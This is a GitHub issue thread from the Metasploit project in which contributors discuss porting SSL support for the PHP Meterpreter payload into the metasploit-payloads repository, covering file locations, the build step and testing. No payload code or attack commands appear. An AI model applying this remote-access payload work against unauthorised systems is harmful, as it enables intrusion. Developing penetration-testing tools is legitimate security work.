New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update PHP Meterpreter SSL Support Code #8075

Open
busterb opened this Issue Mar 8, 2017 · 10 comments

Comments

Projects
None yet
5 participants
@busterb
Contributor

busterb commented Mar 8, 2017

See: #7669

The original PR was based on an older layout of the Metasploit repository and no longer applies cleanly. To be able to move forward with the original PR, you would need to:

  1. Move the PHP code into the new repository at rapid7/metasploit-payloads.
  2. Deduplicate / merge the functionality if possible. The original PR just made a copy of the Meterpreter base code.

Ideally a single payload could work in PHP environments with or without SSL support as well. You'll have to do some experimentation to see if that is possible. See the extensive notes from @sempervictus in the original PR notes above.

This is a useful way for someone interested in Meterpreter and payloads to get involved.

@shucon

This comment has been minimized.

shucon commented Mar 17, 2017

I am interested to work on this issue .
I am new to git community kindly help to work on it .

@itsmeroy2012

This comment has been minimized.

Contributor

itsmeroy2012 commented Mar 20, 2017

1.The PHP code is already present in the new repository at rapid7/metasploit-payloads. Do we have to move something else too?
2. I am unable to 'make install-php' payloads in the repo metasploit-payloads after cloning it.
3. Regarding the merging the functionality portion, How do I test whether it works or not in metasploit-payloads, is there 'rake spec' there too?

@busterb

@busterb

This comment has been minimized.

Contributor

busterb commented Mar 20, 2017

Please look at the original PR carefully. It adds a file called data/meterpreter/meterpreter_ssl.php, the contents of which should be inside if metasploit-payloads now.

If your install works correctly, you should see something like this:

~/projects/metasploit-payloads$ make install-php
Installing PHP payloads
@busterb

This comment has been minimized.

Contributor

busterb commented Mar 20, 2017

To test this, you would of course check out the original PR, and devise a test plan for starting the payload, ensuring it works in different environments. You might ping @bwatters-r7 to facilitate some automatic testing of PHP payloads.

@sempervictus

This comment has been minimized.

Contributor

sempervictus commented Mar 20, 2017

@itsmeroy2012

This comment has been minimized.

Contributor

itsmeroy2012 commented Mar 22, 2017

Where is the file 'reverse_tcp.php'?? Are we supposed to write it down?? @sempervictus @busterb

@busterb

This comment has been minimized.

Contributor

busterb commented Mar 23, 2017

Sorry man, question does not compute.

@timwr

This comment has been minimized.

@itsmeroy2012

This comment has been minimized.

Contributor

itsmeroy2012 commented Mar 23, 2017

Apologies, I should have been more detailed. @timwr @busterb
While studying the five files that @sempervictus created here https://github.com/rapid7/metasploit-framework/pull/7669/files . There is one particular file metasploit-framework/modules/payloads/stagers/php/reverse_tcp_ssl.rb . Which is uploaded below. In that file check Line 39. It reads from another file reverse_tcp.php . I'm uploading the file as .txt as github doesn't support .rb:

File: reverse_tcp_ssl.txt

@busterb

This comment has been minimized.

Contributor

busterb commented Mar 23, 2017

As mentioned in the first sentence of this issue "The original PR was based on an older layout of the Metasploit repository and no longer applies cleanly." In other words, that file has since been renamed and moved since the original PR. You can use git to dredge it up from history if you like (please don't ask me how, that's left as an exercise to the reader).

I suggest just looking at what the code in the original PR does and, using it as a guide, reimplement the functionality using @sempervictus 's suggestions above and on the original PR.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment